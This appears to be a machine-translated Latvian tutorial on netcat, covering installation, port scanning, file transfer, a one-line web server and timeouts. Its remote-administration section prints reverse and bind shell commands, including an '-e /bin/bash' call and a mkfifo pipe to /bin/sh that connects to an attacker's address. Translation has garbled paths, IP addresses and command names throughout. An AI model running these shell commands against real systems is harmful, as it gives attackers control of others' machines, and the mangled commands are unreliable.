Īsa atšķirība starp netcat-tradicionālo un netcat-openbsd
Netcat ir pieejamas divas līdzīgas paketes ar nelielu atšķirību starp tām.
netcat-tradicionāls ietver papildu opciju “-e”, kuru var izmantot programmas saistīšanai (t.i.e bash) ar netcat. Šī funkcija ir ļoti noderīga attālinātai administrēšanai.
netcat-openbsd ir zināms papildu atbalsts IPv6 un starpniekserveriem.
Netcat instalēšana
Lai gan netcat ir iepriekš instalēts lielākajā daļā Linux sadalījumu, bet, ja tā nav, to var viegli instalēt, izmantojot šādas komandas.
Par tradicionālo iepakojumu,
[e-pasts aizsargāts]: ~ $ sudo apt-get install netcat-traditionalOpenbsd versijai,
[aizsargāts ar e-pastu]: ~ $ sudo apt-get install netcat-openbsdNetcat operētājsistēmai Windows var lejupielādēt šeit: https: // sourceforge.net / projekti / nc110 / faili /.
Tagad mēs izpētīsim dažus interesantus netcat lietošanas gadījumus
Ostu skenēšana, izmantojot netcat
Lai meklētu atvērtus portus, izmantojiet opciju '-z'. Netcat mēģinās izveidot savienojumu ar katru portu, nesūtot datus vai ļoti ierobežotus datus UDP gadījumā. Ierakstiet šo
[e-pasts aizsargāts]: ~ $ nc -z -v hackme.org 80... izgriezums ..
hakme.org [217.78.1.155] 80 (http) atvērts
Lai meklētu ostu diapazonu, ierakstiet
[e-pasts aizsargāts]: ~ $ nc -z -nv 192.168. lpp.100.72 20-80(Nezināms) [192.168. lpp.100.72] 80 (http) atvērts
(Nezināms) [192.168. lpp.100.72] 22 (ssh) atvērts
Failu pārsūtīšana ar netcat
Vēl viens noderīgs netcat izmantošanas gadījums ir failu pārsūtīšana starp attāliem datoriem. Jūs varat nosūtīt tekstus un bināros failus no viena datora uz citu datoru. Mēs centīsimies nosūtīt failu “fails.pdf ”no Linux datora uz Windows datoru [IP 192.168. lpp.100.72] kā piemēru izmantojot netcat.
Windows mašīnā (uztvērējā) ierakstiet šo
C: \ Lietotāji> nc -nvlp 1337> fails.pdfKlausos [0.0.0.0] (ģimene 2, 1337. osta)
Linux mašīnā (sūtītājs) ierakstiet šo
[e-pasts aizsargāts]: ~ $ nc -nv 192.168. lpp.100.72 1337 < file.pdfSavienojums ar 192.168. lpp.100.72 1337 ports [tcp / *] izdevās!
Attālā administrēšana ar netcat
Viens no labākajiem netcat izmantošanas gadījumiem ir attālā administrēšana, tas nozīmē, ka jūs varat kontrolēt kāda cita datoru, izmantojot netcat. Netcat-traditional nāk ar '-e' opciju, kuru var izmantot programmas sasaistīšanai (t.i.e cmd.exe Windows vai bash Linux) ar portu, tas nozīmē, ka netcat darbosies kā komunikators starp programmu un attālo datoru. Netcat saņems komandas no attālā datora, izpildīs vietējā sistēmā un nosūtīs rezultātus atpakaļ uz attālo datoru. Šī funkcija tiek plaši izmantota ļaunprātīgiem mērķiem, lai datorsistēmās un serveros saglabātu aizmuguri. Šī funkcija ir pieejama tikai tradicionālajā netcat, taču ar nelielu triku netcat-openbsd var izmantot arī tam pašam mērķim. Varat izmantot divus veidus, kā kontrolēt citu datoru.
Iekšā Apgrieztais apvalks savienojums, uzbrucējs klausās ostā un gaida savienojuma nosūtīšanu no upura mašīnas. To lieto, ja cietušā dators atrodas aiz NAT vai tam nav publiska IP.
Lai iegūtu reverso apvalku, izmantojot netcat, jums ir nepieciešams klausīties ostā, izmantojot netcat. Uzbrucēja mašīnā ierakstiet šo,
[aizsargāts ar e-pastu]: ~ $ nc -nvlp 1337Klausos [0.0.0.0] (ģimene 2, 1337. osta)
Uz cietušā mašīnas (ja netcat-tradicionāls ir instalēts)
// aizstājiet “/ bin / bash” ar “cmd.exe ”Windows gadījumā
[aizsargāts pa e-pastu]: ~ $ nc -nv [IP_ADDR] 1337 -e / bin / bashPriekš netcat-openbsd (kur opcija “-e” netiek atbalstīta)
[e-pasts aizsargāts]: ~ $ rm / tmp / f; mkfifo / tmp / f; cat/ tmp / f | / bin / sh -i 2> & 1 | nc [IP_ADDR] 1337> / tmp / f
Atrodoties a Saistoša čaula Savienojums uzbrucējs sasaista upura mašīnas portu un izveido savienojumu ar šo portu, izmantojot klienta ligzdu. To lieto, ja uzbrucēja mašīna atrodas aiz NAT vai tai nav publiska IP.
Uz cietušā mašīnas ierakstiet
[aizsargāts ar e-pastu]: ~ $ nc -nlvp 1337 -e / bin / bashklausos [jebkuru] 1337 ..
Tagad, lai palaistu komandas upura mašīnā, ierakstiet
[e-pasts aizsargāts]: ~ $ nc -nv 127.0.0.1 1337Savienojums ar 127.0.0.1 1337 ports [tcp / *] izdevās!
$ id
uid = 1000 (azad) gid = 1000 (azad) grupas = 1000 (azad), 4 (adm), 24 (cdrom), 27 (sudo),
30 (kritiens), 46 (plugdev), 118 (lpadmin), 129 (sambashare)
Vienkāršs tīmekļa serveris, izmantojot netcat
Varat arī izdarīt vēl vienu vienkāršu triku, lai izmantotu netcat kā minimālu vienas lapas tīmekļa serveri. Šis tīmekļa serveris būtu ļoti vienkāršs bez īpašām konfigurācijām, un mēs tam pierakstīsim HTML kodu uz pārlūku.
[e-pasts aizsargāts]: ~ $, lai gan taisnība; do echo -e "HTTP / 1.1 200 OK \ n \ n $ (atbalss "
Mans vienkāršais tīmekļa serveris, izmantojot netcat
")" | nc -nvlp 1337; izdarītsKlausos [0.0.0.0] (ģimene 2, 1337. osta)
Tagad mēģiniet ielādēt vietni, izmantojot čokurošanos
[e-pasts aizsargāts]: ~ $ čokurošanās http: // 127.0.0.1: 1337 /Mans vienkāršais tīmekļa serveris, izmantojot netcat
Norādiet taimautu netcat sesijai
Netcat sesijas taimautu var norādīt, izmantojot opciju “-w”. Pēc norādītā laika beigām Netcat automātiski atvienos sesiju.
// -w [laiks sekundēs][e-pasts aizsargāts]: ~ $ nc -w 40 -nvlp 1337
Klausos [0.0.0.0] (ģimene 2, osta 1234)
Turpiniet klausīšanos pat tad, ja klients aizver savienojumu
Normālā režīmā netcat serveris izslēdzas un pārstāj klausīties portā, kad klients aizver savienojumu. Izmantojot “-k” opciju, jūs varat saglabāt serveri
[e-pasts aizsargāts]: ~ $ nc -k -nlvp 1234Klausos [0.0.0.0] (ģimene 2, osta 1234)
Secinājums
Netcat ir vienkārša, taču efektīva lietderība, kuru var izmantot daudzu vienkāršu ikdienas uzdevumu veikšanai. Tas ir iepriekš instalēts gandrīz visās UNIX, piemēram, operētājsistēmās, un to var izmantot dažādiem uzdevumiem, piemēram, saziņai starp diviem datoriem, failu pārsūtīšanai un daudziem citiem.